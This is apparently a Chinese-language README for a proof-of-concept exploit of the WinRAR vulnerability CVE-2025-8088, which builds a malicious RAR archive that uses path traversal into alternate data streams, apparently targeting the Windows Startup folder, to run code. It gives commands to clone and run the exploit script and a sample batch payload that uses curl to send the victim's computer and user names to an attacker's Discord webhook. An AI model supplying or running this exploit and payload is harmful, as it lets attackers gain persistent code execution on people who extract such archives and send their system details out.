一个针对 WinRAR 漏洞(CVE-2025-8088)的概念验证利用程序,影响版本 7.12 及更低版本。该工具创建一个恶意 RAR 存档,通过路径遍历将有效载荷嵌入备用数据流(ADS),可能导致任意代码执行。
# 克隆仓库
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# 安装依赖
pip install reportlab
# 运行利用程序
python CVE-2025-8088.py
编辑有效载荷以调用 Discord Webhook:
# 替换脚本中的 PAYLOAD 变量:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"在 %COMPUTERNAME% 上被 %USERNAME% 提取\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
将 YOUR_DISCORD_WEBHOOK_URL 替换为你实际的 Webhook URL。
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\